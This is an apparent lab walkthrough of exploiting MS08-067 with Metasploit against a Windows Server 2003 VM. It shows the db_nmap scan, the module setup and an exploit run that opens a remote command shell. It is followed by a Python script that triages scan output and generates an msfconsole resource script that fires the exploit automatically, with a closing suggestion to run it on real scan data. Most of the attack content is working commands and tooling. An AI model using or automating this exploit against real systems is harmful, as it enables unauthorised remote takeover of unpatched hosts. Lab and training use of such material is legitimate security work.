Target IP: 192.168.128.149; operating system: Windows Server 2003
Step 1: check that msfconsole is connected to its database:
msf > db_status
[*] postgresql connected to msf
Step 2: scan the target for running services (results are stored in the database because db_nmap is used instead of plain nmap):
msf > db_nmap -sS -sV -O -n 192.168.128.149
[*] Nmap: Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-06 16:54 CST
[*] Nmap: Nmap scan report for 192.168.128.149
[*] Nmap: Host is up (0.00025s latency).
[*] Nmap: Not shown: 986 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp Microsoft ftpd
[*] Nmap: 80/tcp open http Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 777/tcp open multiling-http?
[*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1026/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1027/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1031/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 6002/tcp open http SafeNet Sentinel Protection Server 7.3
[*] Nmap: 7001/tcp open afs3-callback?
[*] Nmap: 7002/tcp open http SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: 8099/tcp open http Microsoft IIS httpd 6.0
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port777-TCP:V=7.50%I=7%D=8/6%Time=5986D987%P=i686-pc-linux-gnu%r(Kerber
[*] Nmap: SF:os,5,"\x01\0\t\xe0\x06")%r(SMBProgNeg,5,"\x01\0\t\xe0\x06")%r(TerminalS
[*] Nmap: SF:erver,A,"\x01\0\t\xe0\x06\x01\0\t\xe0\x06")%r(WMSRequest,5,"\x01\0\t\xe
[*] Nmap: SF:0\x06");
[*] Nmap: MAC Address: 00:0C:29:93:BD:3F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP|2003
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
[*] Nmap: OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 158.59 seconds
Step 3: search for the MS08-067 module. The scan shows SMB on 445/tcp open and an OS fingerprint of Windows XP/2003; MS08-067 is a flaw in the Windows Server service reached over SMB, so this host is a candidate:
msf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
Step 4: load the module:
msf > use exploit/windows/smb/ms08_067_netapi
Step 5: view the options that must be set (RHOST is required and has no default yet):
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
// Set the target host IP
msf exploit(ms08_067_netapi) > set RHOST 192.168.128.149
RHOST => 192.168.128.149
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.128.149 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.128.149 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
// Run the exploit; the bind payload listens on the target's port 4444 and the attacker connects to it to get a shell
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] 192.168.128.149:445 - Automatically detecting the target...
[*] 192.168.128.149:445 - Fingerprint: Windows 2003 - - lang:Unknown
[*] 192.168.128.149:445 - Selected Target: Windows 2003 SP0 Universal
[*] 192.168.128.149:445 - Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.128.145:32839 -> 192.168.128.149:4444) at 2017-08-06 17:01:09 +0800
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
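The steps above are done by hand in msfconsole. As an added example (not part of the original walkthrough and not Metasploit code), the Python script below automates the same reasoning: it parses db_nmap output like the one in Step 2, decides whether a host is an MS08-067 candidate using the heuristic "445/tcp open and an OS guess of Windows 2000/XP/2003" (the platforms ms08_067_netapi carries targets for; the heuristic is this example's own), and emits an msfconsole resource script that replays Steps 3 to 5 with the payload and LPORT shown in the options output. The sample input is constructed from the scan above; the names HostReport, parse_db_nmap, ms08_067_candidate, build_resource_script and the file name ms08_067.rc are this example's assumptions.

```python
"""Triage db_nmap output for MS08-067 candidates and emit an msfconsole resource script.

Added example for this walkthrough; not Metasploit code. Function names and the
candidate heuristic are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input: the relevant lines of the db_nmap output shown in Step 2.
SAMPLE_NMAP_OUTPUT = """\
[*] Nmap: Nmap scan report for 192.168.128.149
[*] Nmap: Host is up (0.00025s latency).
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp Microsoft ftpd
[*] Nmap: 80/tcp open http Microsoft IIS httpd 6.0
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 777/tcp open multiling-http?
[*] Nmap: Running: Microsoft Windows XP|2003
[*] Nmap: OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
"""

MSF_PREFIX = "[*] Nmap: "
HOST_RE = re.compile(r"Nmap scan report for (\S+)")
RUNNING_RE = re.compile(r"^Running: (.+)$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# ms08_067_netapi only ships targets for Windows 2000, XP and 2003, so the
# heuristic is deliberately conservative and skips other MS08-067-affected builds.
TARGETABLE_OS_RE = re.compile(r"Windows (2000|XP|2003)")


@dataclass
class HostReport:
    address: str = ""
    os_guess: str = ""
    # (port, proto) -> (state, service, version string)
    ports: dict = field(default_factory=dict)


def parse_db_nmap(text):
    """Parse the msfconsole-prefixed Nmap lines for a single host."""
    report = HostReport()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(MSF_PREFIX):
            line = line[len(MSF_PREFIX):]
        if (m := HOST_RE.search(line)):
            report.address = m.group(1)
        elif (m := RUNNING_RE.match(line)):
            report.os_guess = m.group(1)
        elif (m := PORT_RE.match(line)):
            port, proto, state, service, version = m.groups()
            report.ports[(int(port), proto)] = (state, service, version or "")
    return report


def ms08_067_candidate(report):
    """SMB reachable on 445/tcp and an OS guess the module has a target for."""
    smb = report.ports.get((445, "tcp"))
    if smb is None or smb[0] != "open":
        return False
    return TARGETABLE_OS_RE.search(report.os_guess) is not None


def build_resource_script(report, payload="windows/shell_bind_tcp", lport=4444):
    """Return an msfconsole resource script that replays Steps 3 to 5 and runs the exploit.

    Defaults mirror the payload options block above. Save as ms08_067.rc and run
    with: msfconsole -q -r ms08_067.rc
    """
    if not ms08_067_candidate(report):
        raise ValueError(f"{report.address or '<unknown>'} is not an MS08-067 candidate")
    commands = [
        "db_status",
        "use exploit/windows/smb/ms08_067_netapi",
        f"set RHOST {report.address}",
        f"set PAYLOAD {payload}",
        f"set LPORT {lport}",
        "show options",
        "exploit",
    ]
    return "\n".join(commands) + "\n"


if __name__ == "__main__":
    host = parse_db_nmap(SAMPLE_NMAP_OUTPUT)
    print(f"{host.address}: candidate={ms08_067_candidate(host)}")
    print(build_resource_script(host), end="")
```

The script refuses to emit a resource file for a host that does not meet the heuristic, so a scan of a Windows 2008 or patched host does not silently produce an exploit attempt; feed it the real db_nmap output rather than the embedded sample when using it.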